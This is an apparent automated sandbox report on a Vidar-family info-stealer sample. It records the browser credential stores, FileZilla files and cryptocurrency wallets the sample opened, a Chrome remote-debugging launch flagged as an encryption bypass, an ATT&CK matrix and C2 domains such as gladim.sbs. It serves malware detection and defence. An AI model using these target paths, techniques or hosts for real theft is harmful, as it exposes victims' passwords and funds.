            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\saved-telemetry-pings\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\crashes\events\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\temporary\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\minidumps\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\archived\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\default\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\glean\tmp\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\to-be-removed\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\sessionstore-backups\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dtbqpus9.default\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\glean\events\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\crashes\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\prefs.jsJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\glean\db\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\glean\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\bookmarkbackups\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
            Source: Yara matchFile source: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: pyjnkasedf.exe PID: 7496, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: C:\Users\user\Desktop\pyjnkasedf.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: pyjnkasedf.exe PID: 7496, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            Create Account
            11
            Process Injection
            1
            Masquerading
            2
            OS Credential Dumping
            1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            Registry Run Keys / Startup Folder
            1
            Registry Run Keys / Startup Folder
            1
            Virtualization/Sandbox Evasion
            1
            Credentials in Registry
            1
            Query Registry
            Remote Desktop Protocol4
            Data from Local System
            1
            Remote Access Software
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAt1
            DLL Side-Loading
            1
            DLL Side-Loading
            11
            Process Injection
            Security Account Manager11
            Security Software Discovery
            SMB/Windows Admin SharesData from Network Shared Drive2
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Obfuscated Files or Information
            NTDS1
            Virtualization/Sandbox Evasion
            Distributed Component Object ModelInput Capture3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Software Packing
            LSA Secrets2
            Process Discovery
            SSHKeylogging4
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading
            Cached Domain Credentials1
            Account Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
            System Owner/User Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem3
            File and Directory Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow34
            System Information Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1565852 Sample: pyjnkasedf.exe Startdate: 30/11/2024 Architecture: WINDOWS Score: 100 51 gladim.sbs 2->51 53 t.me 2->53 61 Suricata IDS alerts for network traffic 2->61 63 Multi AV Scanner detection for submitted file 2->63 65 Yara detected Vidar stealer 2->65 67 4 other signatures 2->67 8 pyjnkasedf.exe 35 2->8         started        12 msedge.exe 66 625 2->12         started        signatures3 process4 dnsIp5 55 gladim.sbs 94.130.210.71, 443, 49705, 49707 HETZNER-ASDE Germany 8->55 57 t.me 149.154.167.99, 443, 49704 TELEGRAMRU United Kingdom 8->57 59 127.0.0.1 unknown unknown 8->59 69 Attempt to bypass Chrome Application-Bound Encryption 8->69 71 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 8->71 73 Found many strings related to Crypto-Wallets (likely being stolen) 8->73 75 4 other signatures 8->75 14 msedge.exe 2 11 8->14         started        17 chrome.exe 8 8->17         started        20 cmd.exe 8->20         started        22 msedge.exe 12->22         started        24 msedge.exe 12->24         started        26 msedge.exe 12->26         started        28 msedge.exe 12->28         started        signatures6 process7 dnsIp8 77 Monitors registry run keys for changes 14->77 30 msedge.exe 14->30         started        41 192.168.2.10, 138, 443, 49704 unknown unknown 17->41 43 239.255.255.250 unknown Reserved 17->43 32 chrome.exe 17->32         started        35 conhost.exe 20->35         started        37 timeout.exe 20->37         started        45 sb.scorecardresearch.com 18.165.220.57, 443, 49863 MIT-GATEWAYSUS United States 22->45 47 104.40.82.182, 443, 49892, 49893 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 22->47 49 25 other IPs or domains 22->49 signatures9 process10 dnsIp11 39 www.google.com 142.250.181.100, 443, 49743, 49747 GOOGLEUS United States 32->39

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            pyjnkasedf.exe58%ReversingLabsWin32.Trojan.Vidar
            pyjnkasedf.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://gladim.sbsDGCBGII0%Avira URL Cloudsafe
            https://gladim.sbs0%Avira URL Cloudsafe
            https://gladim.sbs/Y0%Avira URL Cloudsafe
            https://gladim.sbs/0%Avira URL Cloudsafe
            https://gladim.sbs/k0%Avira URL Cloudsafe
            https://gladim.sbs/U0%Avira URL Cloudsafe
            https://gladim.sbs/S0%Avira URL Cloudsafe
            https://gladim.sbs/a0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            chrome.cloudflare-dns.com
            172.64.41.3
            truefalse
              high
              t.me
              149.154.167.99
              truefalse
                high
                ssl.bingadsedgeextension-prod-europe.azurewebsites.net
                94.245.104.56
                truefalse
                  high
                  sb.scorecardresearch.com
                  18.165.220.57
                  truefalse
                    high
                    www.google.com
                    142.250.181.100
                    truefalse
                      high
                      gladim.sbs
                      94.130.210.71
                      truetrue
                        unknown
                        googlehosted.l.googleusercontent.com
                        142.250.181.97
                        truefalse
                          high
                          clients2.googleusercontent.com
                          unknown
                          unknownfalse
                            high
                            bzib.nelreports.net
                            unknown
                            unknownfalse
                              high
                              assets.msn.com
                              unknown
                              unknownfalse
                                high
                                c.msn.com
                                unknown
                                unknownfalse
                                  high
                                  ntp.msn.com
                                  unknown
                                  unknownfalse
                                    high
                                    api.msn.com
                                    unknown
                                    unknownfalse
                                      high
                                      NameMaliciousAntivirus DetectionReputation
                                      https://assets2.msn.com/bundles/v1/edgeChromium/latest/vendors.7e27cca6027b8d6697cb.jsfalse
                                        high
                                        https://sb.scorecardresearch.com/b2?rn=1733002729077&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2A00BA3058306B91366DAF7759986AB6&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
                                          high
                                          https://deff.nelreports.net/api/report?cat=msnfalse
                                            high
                                            https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0false
                                              high
                                              https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1733002736086&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                high
                                                https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1733002735071&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                  high
                                                  https://c.msn.com/c.gif?rnd=1733002729077&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=bfe7ebb6adf24f17bd5171beb183b3d8&activityId=bfe7ebb6adf24f17bd5171beb183b3d8&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=1BB4809CB69848CA9FA43D546A2C6D92&MUID=2A00BA3058306B91366DAF7759986AB6false
                                                    high
                                                    https://bzib.nelreports.net/api/report?cat=bingbusinessfalse
                                                      high
                                                      https://sb.scorecardresearch.com/b?rn=1733002729077&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2A00BA3058306B91366DAF7759986AB6&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
                                                        high
                                                        https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1733002735907&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                          high
                                                          https://clients2.googleusercontent.com/crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crxfalse
                                                            high
                                                            https://gladim.sbs/true
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1733002729075&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                              high
                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                              https://duckduckgo.com/chrome_newtabpyjnkasedf.exe, 00000000.00000002.2025435836.00000000037D0000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000002.2024724146.0000000003642000.00000004.00000020.00020000.00000000.sdmp, AFHDHC.0.dr, Web Data.15.dr, IDBKFH.0.drfalse
                                                                high
                                                                https://c.msn.com/2cc80dabc69f58b6_1.15.drfalse
                                                                  high
                                                                  https://duckduckgo.com/ac/?q=pyjnkasedf.exe, 00000000.00000002.2025435836.00000000037D0000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000002.2024724146.0000000003642000.00000004.00000020.00020000.00000000.sdmp, AFHDHC.0.dr, Web Data.15.dr, IDBKFH.0.drfalse
                                                                    high
                                                                    https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drfalse
                                                                      high
                                                                      https://ntp.msn.com/0000003.log6.15.drfalse
                                                                        high
                                                                        https://ntp.msn.com/_defaultQuotaManager.15.drfalse
                                                                          high
                                                                          https://www.last.fm/1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drfalse
                                                                            high
                                                                            https://ntp.msn.cn/edge/ntp2cc80dabc69f58b6_1.15.drfalse
                                                                              high
                                                                              https://sb.scorecardresearch.com/2cc80dabc69f58b6_1.15.drfalse
                                                                                high
                                                                                https://steamcommunity.com/profiles/76561199803837316g88paMozilla/5.0pyjnkasedf.exefalse
                                                                                  high
                                                                                  https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpgpyjnkasedf.exe, 00000000.00000002.2023659585.000000000092E000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000002.2026957320.0000000003CBA000.00000004.00000020.00020000.00000000.sdmp, HIDHIE.0.drfalse
                                                                                    high
                                                                                    https://docs.google.com/manifest.json0.15.drfalse
                                                                                      high
                                                                                      https://www.youtube.com1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drfalse
                                                                                        high
                                                                                        https://www.instagram.com1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drfalse
                                                                                          high
                                                                                          https://web.skype.com/?browsername=edge_canary_shoreline1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drfalse
                                                                                            high
                                                                                            https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700pyjnkasedf.exe, 00000000.00000002.2023659585.000000000092E000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000002.2026957320.0000000003CBA000.00000004.00000020.00020000.00000000.sdmp, HIDHIE.0.drfalse
                                                                                              high
                                                                                              https://drive.google.com/manifest.json0.15.drfalse
                                                                                                high
                                                                                                https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=11c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drfalse
                                                                                                  high
                                                                                                  https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=21c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drfalse
                                                                                                    high
                                                                                                    https://www.messenger.com1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drfalse
                                                                                                      high
                                                                                                      https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drfalse
                                                                                                        high
                                                                                                        https://outlook.office.com/mail/compose?isExtension=true1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drfalse
                                                                                                          high
                                                                                                          https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&ctapyjnkasedf.exe, 00000000.00000002.2023659585.000000000092E000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000002.2026957320.0000000003CBA000.00000004.00000020.00020000.00000000.sdmp, HIDHIE.0.drfalse
                                                                                                            high
                                                                                                            https://unitedstates4.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.15.drfalse
                                                                                                              high
                                                                                                              https://i.y.qq.com/n2/m/index.html1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drfalse
                                                                                                                high
                                                                                                                https://www.deezer.com/1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drfalse
                                                                                                                  high
                                                                                                                  https://steamcommunity.com/profiles/76561199803837316pyjnkasedf.exefalse
                                                                                                                    high
                                                                                                                    https://gladim.sbspyjnkasedf.exe, 00000000.00000003.1340492383.000000000093E000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://web.telegram.org/1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drfalse
                                                                                                                      high
                                                                                                                      https://drive-daily-2.corp.google.com/manifest.json0.15.drfalse
                                                                                                                        high
                                                                                                                        https://gladim.sbsDGCBGIIpyjnkasedf.exe, 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://drive-daily-4.corp.google.com/manifest.json0.15.drfalse
                                                                                                                          high
                                                                                                                          https://vibe.naver.com/today1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drfalse
                                                                                                                            high
                                                                                                                            https://srtb.msn.com/2cc80dabc69f58b6_1.15.drfalse
                                                                                                                              high
                                                                                                                              https://unitedstates1.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.15.drfalse
                                                                                                                                high
                                                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=pyjnkasedf.exe, 00000000.00000002.2025435836.00000000037D0000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000002.2024724146.0000000003642000.00000004.00000020.00020000.00000000.sdmp, AFHDHC.0.dr, Web Data.15.dr, IDBKFH.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://assets.msn.com4dc7e5a3-b915-4af4-a840-9d0cb873b8e0.tmp.16.drfalse
                                                                                                                                    high
                                                                                                                                    https://www.ecosia.org/newtab/pyjnkasedf.exe, 00000000.00000002.2024724146.0000000003642000.00000004.00000020.00020000.00000000.sdmp, IDBKFH.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://drive-daily-1.corp.google.com/manifest.json0.15.drfalse
                                                                                                                                        high
                                                                                                                                        https://t.me/gv4dlpxpyjnkasedf.exe, 00000000.00000003.1288702655.0000000000945000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://excel.new?from=EdgeM365Shoreline1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drfalse
                                                                                                                                            high
                                                                                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brpyjnkasedf.exe, 00000000.00000002.2028055481.0000000003EDD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://drive-daily-5.corp.google.com/manifest.json0.15.drfalse
                                                                                                                                                high
                                                                                                                                                https://www.google.com/chromecontent.js.15.dr, content_new.js.15.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.tiktok.com/1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.msn.com/web-notification-icon-light.png2cc80dabc69f58b6_1.15.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://assets2.msn.come4931ed2-fe5c-4f76-8ed2-50603fc61b68.tmp.16.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://chromewebstore.google.com/manifest.json.15.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://drive-preprod.corp.google.com/manifest.json0.15.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://srtb.msn.cn/2cc80dabc69f58b6_1.15.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://msn.comXIDv10Cookies.16.drfalse
                                                                                                                                                                high
